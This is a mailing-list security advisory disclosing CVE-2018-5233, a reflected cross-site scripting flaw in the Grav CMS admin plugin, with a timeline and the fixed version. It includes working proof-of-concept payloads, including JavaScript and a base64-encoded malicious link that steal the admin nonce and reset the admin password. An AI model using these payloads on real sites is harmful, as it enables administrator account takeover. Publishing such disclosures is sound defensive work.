Products Openwall GNU/*/Linux   server OS Linux Kernel Runtime Guard John the Ripper   password cracker Free & Open Source for any platform in the cloud Pro for Linux Pro for macOS Wordlists   for password cracking passwdqc   policy enforcement Free & Open Source for Unix Pro for Windows (Active Directory) yescrypt   KDF & password hashing yespower   Proof-of-Work (PoW) crypt_blowfish   password hashing phpass   ditto in PHP tcb   better password shadowing Pluggable Authentication Modules scanlogd   port scan detector popa3d   tiny POP3 daemon blists   web interface to mailing lists msulogin   single user mode login php_mt_seed   mt_rand() cracker Services Publications Articles Presentations Resources Mailing lists Community wiki Source code repositories (GitHub) Source code repositories (CVSweb) File archive & mirrors How to verify digital signatures OVE IDs What's new

Date: Thu, 15 Mar 2018 10:46:12 +0100
From: Sydream Labs <labs@...dream.com>
To: fulldisclosure@...lists.org, oss-security@...ts.openwall.com
Subject: [CVE-2018-5233] Grav CMS admin plugin Reflected Cross Site Scripting
 (XSS) vulnerability

# [CVE-2018-5233] Grav CMS admin plugin Reflected Cross Site Scripting
(XSS) vulnerability

## Description

Grav CMS is a flat-file CMS using Markdown files for content management
([Official Website](https://getgrav.org/)).

It has been elected "Best Open Source CMS of 2016" by [CMS
critic](https://www.cmscritic.com/the-winner-of-best-open-source-cms-for-2016-is-grav/).

The application does not always filter user input correctly, thereby
allowing an attacker to inject arbitrary Web content in the response of
the server (reflected Cross Site Scripting).

**CVE ID**: CVE-2018-5233

**Access Vector**: remote

**Security Risk**: high

**Vulnerability**: CWE-79

**CVSS Base Score**: 7.4

**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N


## Details

On lines 355 and 358 of `system/src/Grav/Common/Twig/Twig.php`,
unfiltered user input is passed in the `$error_msg` variable.

```
$output = $this->twig->render($template, $twig_vars);
} catch (\Twig_Error_Loader $e) {

.. snip ..

            throw new \RuntimeException($error_msg, 400, $e);
        }
    } else {
        throw new \RuntimeException($error_msg, 400, $e);
    }
}
```

As a result, generating an exception by accessing
`/admin/tools/someunexistingpage` and manipulating the
`someunexistingpage` part of the URL allows to inject arbitrary Web
content into the server's response.

## Proof of Concept #1

Visiting the following page:

```
/admin/tools/a--%3E%3Cimg%20src=x%20onerror=alert(1)%3E
```

will cause the execution of the `alert(1)` JavaScript code in the
context of the visitor's browser.

## Proof of Concept #2

By tricking a logged-in admin into visiting a malicious link, any
unauthenticated user can elevate its privileges to site administration.

Here follows a Proof of Concept code which:

1. Grabs the `admin-nonce` of the logged-in admin
2. Prints that nonce
3. Uses it to change the current admin's password to `Password7`

```
<script
src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>

<script>
adminNonce = "";
$.get( "/admin/user/admin",
function( data ) {adminNonce = $("input[name=admin-nonce]",
data).val()}).done(
function(){
alert(window.adminNonce);
$.post( "/admin/user/admin", {
    "task": "save",
        "admin-nonce": adminNonce,
    "data[password]": "Password7"},
    function(data){document.write(data)})}
);
</script>
```

Here is the base64 encoded version of the payload, injected in the
malicious link:

```
http://example.site.com/admin/tools/a--%3E%3Cimg%20src=x%20onerror=document['write'](atob('PHNjcmlwdCBzcmM9Imh0dHBzOi8vYWpheC5nb29nbGVhcGlzLmNvbS9hamF4L2xpYnMvanF1ZXJ5LzMuMi4xL2pxdWVyeS5taW4uanMiPjwvc2NyaXB0PjxzY3JpcHQ+YWRtaW5Ob25jZSA9ICIiOyQuZ2V0KCAiL2FkbWluL3VzZXIvYWRtaW4iLCBmdW5jdGlvbiggZGF0YSApIHthZG1pbk5vbmNlID0gJCgiaW5wdXRbbmFtZT1hZG1pbi1ub25jZV0iLCBkYXRhKS52YWwoKX0pLmRvbmUoZnVuY3Rpb24oKXthbGVydCh3aW5kb3cuYWRtaW5Ob25jZSk7JC5wb3N0KCAiL2FkbWluL3VzZXIvYWRtaW4iLCB7ICJ0YXNrIjogInNhdmUiLCAiYWRtaW4tbm9uY2UiOiBhZG1pbk5vbmNlLCJkYXRhW3Bhc3N3b3JkXSI6ICJQYXNzd29yZDcifSwgZnVuY3Rpb24oZGF0YSl7ZG9jdW1lbnQud3JpdGUoZGF0YSl9KX0pOzwvc2NyaXB0Pgo='))%3E
```

Now, after the attacker tricks a logged-in admin into clicking on this
link, the admin's password is changed to the attacker controlled value.
Thus, the attacker can log in with `Password7` and navigate inside the
administration interface.


## Timeline (dd/mm/yyyy)

* 01/07/2017 : Initial discovery
* 01/07/2017 : Contact with the editor (email address)
* 02/07/2017 : Editor acknowledges the report
* 02/07/2017 : Sending further details and PoC code to the editor
* 04/07/2017 : Editor fixes the vulnerability
* 15/03/2018 : Advisory publication

## Fixes

Upgrade to version 1.3.0 and above (currently 1.3.10)

## Affected versions

* Version 1.2.4 (last stable version as of 02/07/2017 - previous
versions are probably also vulnerable but not tested)

## Credits

* Kevin LOCATI <k.locati@...dream.com>


-- 
SYSDREAM Labs <labs@...dream.com>

GPG :
47D1 E124 C43E F992 2A2E
1551 8EB4 8CD9 D5B2 59A1

* Website: https://sysdream.com/
* Twitter: @sysdream



Download attachment "signature.asc" of type "application/pgp-signature" (820 bytes)

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.